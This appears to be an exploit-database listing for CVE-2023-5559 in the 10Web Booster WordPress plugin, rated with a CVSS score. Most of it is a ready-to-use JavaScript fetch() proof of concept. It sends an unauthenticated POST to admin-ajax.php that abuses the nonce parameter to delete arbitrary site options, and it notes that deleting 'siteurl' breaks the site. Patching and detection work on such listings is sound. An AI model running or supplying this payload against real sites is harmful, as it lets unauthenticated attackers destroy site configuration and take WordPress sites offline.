Exploit for 10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion CVE-2023-5559

Name: Exploit for 10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion CVE-2023-5559
Rating: 5 (6 reviews)

2023-10-31 | CVSS 6.4

## https://sploitus.com/exploit?id=WPEX-ID:EBA46F7D-E4DB-400C-8032-015F21087BBF
fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": 'action=two_activate_score_check&nonce=template',
  "method": "POST",
});

Changing the `nonce` parameter to, for example, `nonce=siteurl` will cause the site to no longer work.